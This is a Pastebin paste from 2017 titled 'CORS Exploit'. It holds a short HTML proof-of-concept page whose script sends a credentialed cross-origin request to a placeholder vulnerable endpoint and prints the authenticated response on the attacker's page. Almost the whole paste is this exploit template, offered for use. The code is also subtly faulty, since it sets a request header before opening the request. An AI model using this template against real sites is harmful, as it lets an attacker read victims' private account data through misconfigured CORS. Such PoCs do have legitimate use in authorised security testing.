Advertisement
0xspade

CORS Exploit

Jul 8th, 2017
464
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 0.78 KB | None | 0 0
  1. <!DOCTYPE html>
  2. <html>
  3.     <head>
  4.         <title>CORS PoC Exploit</title>
  5.     </head>
  6.     <body>
  7.         <center>
  8.  
  9.             <h1>CORS Exploit</h1>
  10.                 <hr>
  11.             <div id="demo">
  12.                 <button type="button" onclick="cors()">Exploit</button>
  13.             </div>
  14.            
  15.             <script type="text/javascript">
  16.                 function cors() {
  17.                     var xhttp = new XMLHttpRequest();
  18.                     xhttp.setRequestHeader("Content-Type","text/plain");
  19.                     xhttp.withCredentials = "true";
  20.                     xhttp.onreadystatechange = function() {
  21.                         if(this.readyState == 4 && this.status == 200) {
  22.                             document.getElementById("demo").innerHTML = this.responseText;
  23.                         }
  24.                     };
  25.                     xhttp.open("GET", "Vulnerable_Endpoint_Goes_Here", true);
  26.                     xhttp.withCredentials = true;
  27.                     xhttp.send();
  28.                 }
  29.             </script>
  30.  
  31.         </center>
  32.     </body>
  33. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement